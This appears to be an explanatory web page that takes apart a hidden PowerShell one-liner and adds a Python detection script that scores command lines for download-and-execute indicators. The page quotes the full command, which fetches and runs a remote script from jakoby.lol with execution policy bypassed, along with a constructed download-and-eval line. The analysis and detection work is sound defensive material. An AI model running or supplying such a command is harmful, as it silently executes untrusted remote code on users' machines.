This PowerShell code appears to download and execute a script...

June 29, 2025 at 06:04 PM

powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"

This PowerShell code appears to download and execute a script from an external source, which is a common pattern used in malicious or unauthorized activities. Here's a breakdown of what it does:

1. powershell -w h -NoP -NonI -Ep Bypass:

  • -w h (short for -WindowStyle Hidden): Starts PowerShell with a hidden window so the user doesn't see it.
  • -NoP (-NoProfile): Skips loading the PowerShell profile, so nothing in the user's profile scripts runs or interferes with execution.
  • -NonI (-NonInteractive): Runs PowerShell in non-interactive mode, so it never prompts the user.
  • -Ep Bypass (-ExecutionPolicy Bypass): Bypasses the script execution policy for this process, allowing scripts to run regardless of the system-wide policy setting.

2. $D="$env:tmp":

  • Sets the variable $D to the temporary directory of the system (retrieved from the environment variable $env:tmp).

3. iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip":

  • Uses the Invoke-WebRequest cmdlet (via its alias iwr) to download a file from https://jakoby.lol/1ae.
  • -O (-OutFile) saves the downloaded file (likely a ZIP archive) to the temporary directory as hg.zip.

4. Expand-Archive "$D\hg.zip" -Des $D -Force:

  • Extracts the contents of the downloaded ZIP file (hg.zip) into the temporary directory ($D), given by -Des (-DestinationPath).
  • The -Force flag overwrites any files that already exist at the destination.

5. . "$D\hg\main.ps1":

  • Executes the PowerShell script main.ps1 located in the extracted folder (hg) in the temporary directory.
  • The leading . (dot-sourcing) runs the script in the current scope rather than a child scope, so any functions and variables it defines persist in the PowerShell session.

What does this overall script do?

It:

  1. Sets up the environment so the script runs silently, with no visible window and no prompts.
  2. Downloads an archive (ZIP) from an external URL (https://jakoby.lol/1ae).
  3. Extracts the archive to the system's temporary directory.
  4. Runs a PowerShell script (main.ps1) from the extracted archive.

Possible Concerns:

  • The URL points to an external source, and nothing verifies or validates the downloaded contents (no hash check, no signature). If the archive contains malicious code, this script compromises the system by executing code from an untrusted source.
  • It bypasses the execution policy and runs with a hidden window, both of which are common characteristics of malicious scripts.
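The breakdown and the concerns above amount to a list of indicators that a defender can match against process command lines. The following is an added example (not part of the original explanation) that scores a command line, such as the CommandLine field of a Sysmon Event ID 1 or Windows Security 4688 record, against those indicators. The rule names, weights and the flagging threshold are assumptions chosen for illustration; the sample lines are constructed, except the first, which is the one-liner from the page.

```python
"""Indicator-based triage of PowerShell command lines (added example).

Each rule corresponds to one step in the breakdown above: hidden window,
no profile, non-interactive, execution-policy bypass, web download, drop
to the temp directory, archive extraction, and script execution.
"""
import re
from dataclasses import dataclass, field


def prefix_re(word: str, min_len: int) -> str:
    """Regex accepting any prefix of `word` that is at least `min_len` long.

    powershell.exe accepts unambiguous parameter prefixes (-w for
    -WindowStyle, -NoP for -NoProfile, -NonI for -NonInteractive), which
    is how the one-liner on the page shortens them.
    """
    tail = ""
    for ch in reversed(word[min_len:]):
        tail = f"(?:{ch}{tail})?"
    return word[:min_len] + tail


# (name, weight, pattern); weights are an assumption for this example.
RULES = [
    ("hidden_window", 2, rf"-{prefix_re('windowstyle', 1)}\s+{prefix_re('hidden', 1)}\b"),
    ("no_profile", 1, rf"-{prefix_re('noprofile', 3)}\b"),
    ("non_interactive", 1, rf"-{prefix_re('noninteractive', 4)}\b"),
    # -Ep is a short form powershell.exe accepts besides prefixes of -ExecutionPolicy
    ("ep_bypass", 2, rf"-(?:ep|{prefix_re('executionpolicy', 2)})\s+bypass\b"),
    ("web_download", 2, r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b"),
    ("temp_drop", 1, r"\$env:te?mp\b|%temp%|\\temp\\"),
    ("archive_expand", 1, r"\bexpand-archive\b"),
    # dot-sourcing a .ps1 file, or piping downloaded text into Invoke-Expression
    ("script_exec", 2, r"\.\s+[\"']?[^;\"']*\.ps1\b|\biex\b|\binvoke-expression\b"),
]
COMPILED = [(name, weight, re.compile(pat, re.IGNORECASE)) for name, weight, pat in RULES]
SUSPICIOUS_AT = 6  # assumption: total weight at which a line is flagged


@dataclass
class Triage:
    cmdline: str
    indicators: list[str] = field(default_factory=list)
    score: int = 0

    @property
    def verdict(self) -> str:
        if self.score >= SUSPICIOUS_AT:
            return "suspicious"
        return "review" if self.score >= 3 else "low"


def triage(cmdline: str) -> Triage:
    """Match every rule against one command line and total the weights."""
    result = Triage(cmdline)
    for name, weight, rx in COMPILED:
        if rx.search(cmdline):
            result.indicators.append(name)
            result.score += weight
    return result


def triage_many(lines: list[str]) -> list[Triage]:
    """Score a batch of command lines, highest score first."""
    return sorted((triage(line) for line in lines), key=lambda t: t.score, reverse=True)


# The one-liner from the page, followed by constructed lines for contrast.
PAGE_ONELINER = r'''powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"'''
SAMPLE_LINES = [
    PAGE_ONELINER,
    r'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',      # constructed, routine admin use
    r'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1',  # constructed, scheduled task
    r'''pwsh -nop -w hidden -c "iex (iwr 'http://example.invalid/stage2')"''',  # constructed, download-and-eval
]

if __name__ == "__main__":
    for t in triage_many(SAMPLE_LINES):
        print(f"{t.verdict:10} score={t.score:2} {t.indicators}")
        print(f"           {t.cmdline[:90]}")
```

Individual flags such as -NoProfile or -ExecutionPolicy Bypass are common in legitimate automation, which is why the example scores combinations rather than alerting on any single parameter; the page's one-liner trips every rule, while the scheduled-task line scores low.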

Recommendation:

If this script was found on your system or is being executed without your knowledge, treat it as suspicious and investigate further (check which process launched it and whether hg.zip or the hg folder exists in the temp directory). Avoid running such scripts unless their source and purpose are fully trusted and verified.
